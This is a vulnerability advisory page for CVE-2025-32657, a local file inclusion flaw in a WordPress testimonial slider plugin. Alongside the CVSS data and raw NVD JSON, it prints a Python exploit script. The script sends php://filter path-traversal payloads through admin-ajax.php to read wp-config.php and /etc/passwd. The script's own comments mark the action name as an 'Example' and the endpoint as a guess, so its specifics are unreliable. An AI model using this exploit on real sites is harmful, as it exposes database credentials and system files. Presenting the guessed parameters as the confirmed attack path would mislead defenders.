Security Vulnerability Report
中文
CVE-2025-32657 CVSS 7.5 HIGH

CVE-2025-32657

Published: 2025-10-22 15:15:33
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Testimonial Slider And Showcase Pro testimonial-slider-showcase-pro allows PHP Local File Inclusion.This issue affects Testimonial Slider And Showcase Pro: from n/a through <= 2.1.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Testimonial Slider And Showcase Pro <= 2.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-32657 - Testimonial Slider And Showcase Pro LFI PoC # Vulnerability: PHP Local File Inclusion # Affected: Testimonial Slider And Showcase Pro <= 2.1.7 import requests TARGET_URL = "http://target-wordpress-site.com" # Low-privilege authenticated session cookie (subscriber or similar role) COOKIES = { "wordpress_logged_in_xxx": "authenticated_session_cookie" } def exploit_lfi(file_path): """ Exploit the Local File Inclusion vulnerability by injecting a malicious file path through the vulnerable parameter. """ # Vulnerable endpoint typically related to template/file loading endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Payload using PHP filter wrapper to read file contents as base64 payload = f"php://filter/convert.base64-encode/resource={file_path}" params = { "action": "testimonial_slider_load_template", # Example action "template": payload # Vulnerable parameter } try: response = requests.post( endpoint, data=params, cookies=COOKIES, timeout=10 ) if response.status_code == 200: import base64 try: decoded = base64.b64decode(response.text).decode('utf-8', errors='ignore') print(f"[+] File contents of {file_path}:") print(decoded) except Exception: print(f"[+] Raw response:\n{response.text}") else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Example: Read WordPress configuration file if __name__ == "__main__": exploit_lfi("../../../wp-config.php") # Other targets: # exploit_lfi("../../../etc/passwd") # exploit_lfi("wp-content/plugins/testimonial-slider-showcase-pro/test.php")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32657", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:33.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Testimonial Slider And Showcase Pro testimonial-slider-showcase-pro allows PHP Local File Inclusion.This issue affects Testimonial Slider And Showcase Pro: from n/a through <= 2.1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/testimonial-slider-showcase-pro/vulnerability/wordpress-testimonial-slider-and-showcase-pro-plugin-2-1-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}